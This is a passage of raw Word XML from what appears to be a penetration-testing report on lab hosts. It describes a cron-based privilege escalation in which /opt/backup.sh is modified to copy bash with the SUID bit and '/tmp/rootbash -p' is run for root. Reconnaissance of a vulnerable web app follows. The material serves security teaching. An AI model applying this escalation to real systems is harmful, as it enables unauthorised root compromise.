        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource62"</w:instrText>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.44</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
      <w:r w:rsidR="008F7A55"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406B7D62" w14:textId="46489399" w:rsidR="00AE369A" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE369A" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>After verifying that /opt/backup.sh was writable by the admins group and executed every minute by root, the tester modified the script to deploy a privilege</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>escalation payload. The injected commands copied /bin/bash to /tmp/rootbash, assigned the SUID</w:t>
      </w:r>
      <w:r w:rsidR="008D4476" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Set User ID)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> bit to the copied binary, and awaited execution during the next cron cycle. Once the scheduled task ran, /tmp/rootbash became a root</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:noBreakHyphen/>
        <w:t>privileged shell. Executing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77688681" w14:textId="77777777" w:rsidR="00AE369A" w:rsidRPr="009025BF" w:rsidRDefault="00AE369A" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/rootbash -p </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1BECD9" w14:textId="37C697CA" w:rsidR="00F77ACB" w:rsidRPr="00D77DFE" w:rsidRDefault="00AE369A" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>provided immediate root access, confirming successful privilege escalation and complete compromise of the host</w:t>
      </w:r>
      <w:r w:rsidR="005B655F" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in image 5.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB8A9C6" w14:textId="77777777" w:rsidR="00EF455B" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77ACB" w:rsidP="00183A38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E05617B" wp14:editId="78B2940D">
            <wp:extent cx="3733800" cy="2483199"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="281495578"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495578" name="Picture 18" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3748369" cy="2492888"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F031E" w14:textId="5987F95D" w:rsidR="0018438B" w:rsidRPr="00D77DFE" w:rsidRDefault="0018438B" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Image 5.4: Overwrite file to get root privileges</w:t>
      </w:r>
      <w:r w:rsidR="00AC2949">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EED65E7" w14:textId="58E833BB" w:rsidR="00EF455B" w:rsidRPr="00D77DFE" w:rsidRDefault="00EF455B" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc223521127"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00545188" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable web app: Web Application RCE and Internal Network Pivoting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
      <w:r w:rsidR="00733697" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45615130" w14:textId="4A7B52CB" w:rsidR="00DD5501" w:rsidRPr="00D77DFE" w:rsidRDefault="00DD5501" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc223521128"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="00EB2714" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.1 Reconnaissance and enumeration on 10.0.3.190</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="2FA9FC87" w14:textId="6646D461" w:rsidR="00367D87" w:rsidRPr="00D77DFE" w:rsidRDefault="00367D87" w:rsidP="00406886">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The assessment began with host discovery within the 10.0.3.0/24 subnet. A network sweep identified an active host at 10.0.3.190</w:t>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="118" w:name="paragraph64"/>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource64"</w:instrText>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008F7A55" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.45</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
      <w:r w:rsidR="008F7A55"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 Following host enumeration, a port scan was conducted to determine accessible services. The scan revealed three noteworthy services</w:t>
      </w:r>
      <w:r w:rsidR="001D0438" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in</w:t>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="119" w:name="paragraph65"/>
      <w:r w:rsidR="00406886" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource65"</w:instrText>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.46</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
      <w:r w:rsidR="00406886"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF165C4" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00367D87" w:rsidP="00EA3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3D53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00EA3D53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (File Transfer Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA3D53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> on port 21 (vsftpd 3.0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5305865E" w14:textId="77777777" w:rsidR="00EA3D53" w:rsidRDefault="00367D87" w:rsidP="00EA3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3D53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SSH on port 22 (OpenSSH 9.6p1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7122B329" w14:textId="7A02A875" w:rsidR="009025BF" w:rsidRPr="00EA3D53" w:rsidRDefault="00367D87" w:rsidP="00EA3D53">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA3D53">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>HTTPon port 80 (Apache httpd 2.4.58)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1028ACB8" w14:textId="36C86724" w:rsidR="00367D87" w:rsidRPr="009025BF" w:rsidRDefault="00367D87" w:rsidP="009025BF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Given the presence of an HTTP service, the next phase focused on web enumeration. Directory and endpoint discovery identified several accessible locations</w:t>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown in </w:t>
      </w:r>
      <w:bookmarkStart w:id="120" w:name="paragraph66"/>
      <w:r w:rsidR="00406886" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "resource66"</w:instrText>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00406886" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Figure A.47</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
      <w:r w:rsidR="00406886" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00EA1C3A" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (see Appendix A)</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, including:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A523D4" w14:textId="77777777" w:rsidR="00367D87" w:rsidRPr="009C6B75" w:rsidRDefault="00367D87" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /articles/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291C99C6" w14:textId="77777777" w:rsidR="00367D87" w:rsidRPr="009C6B75" w:rsidRDefault="00367D87" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/files/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EEB929" w14:textId="77777777" w:rsidR="00367D87" w:rsidRPr="009C6B75" w:rsidRDefault="00367D87" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E046266" w14:textId="77777777" w:rsidR="00367D87" w:rsidRPr="009C6B75" w:rsidRDefault="00367D87" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/lang/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E304E2F" w14:textId="30728C31" w:rsidR="00367D87" w:rsidRPr="009C6B75" w:rsidRDefault="00367D87" w:rsidP="00585A7B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6B75">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/main.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605205D7" w14:textId="72C36E2D" w:rsidR="00FE7E01" w:rsidRPr="00D77DFE" w:rsidRDefault="00367D87" w:rsidP="00EA3D53">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigating to main.php exposed a web-based utility panel offering multiple interactive functions such as a file viewer, an image upload feature, a language loader, a DNS </w:t>
      </w:r>
      <w:r w:rsidR="004700D3" w:rsidRPr="00D77DFE">
        <w:rPr>
